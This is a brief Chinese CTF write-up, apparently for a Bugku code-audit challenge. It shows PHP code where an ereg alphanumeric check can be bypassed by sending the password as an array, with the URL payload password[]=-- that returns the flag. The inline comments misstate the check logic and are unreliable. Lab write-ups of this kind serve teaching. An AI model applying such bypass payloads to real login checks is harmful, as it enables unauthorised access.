数组返回NULL绕过

Posted observering

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了数组返回NULL绕过相关的知识,希望对你有一定的参考价值。

0x01

<?php
$flag = "flag";

if (isset ($_GET[‘password‘])) {
	if (ereg ("^[a-zA-Z0-9]+$", $_GET[‘password‘]) === FALSE)
//传入的参数中不能存在a-zA-Z0-9中任意一值
		echo ‘You password must be alphanumeric‘;
	else if (strpos ($_GET[‘password‘], ‘--‘) !== FALSE)
//传入的参数必须有--
		die(‘Flag: ‘ . $flag);
	else
		echo ‘Invalid password‘;
}
?>

数组绕过

payload:

http://123.206.87.240:9009/19.php?password[]=--

参考链接:
https://blog.csdn.net/qq_36869808/article/details/83538779

以上是关于数组返回NULL绕过的主要内容,如果未能解决你的问题,请参考以下文章

数组返回NULL绕过

bugku 代码审计

getActivity() 在片段上返回 null?

android片段getArguments()返回null

安卓。片段 getActivity() 有时返回 null

片段中的TextView在Android Studio中返回Null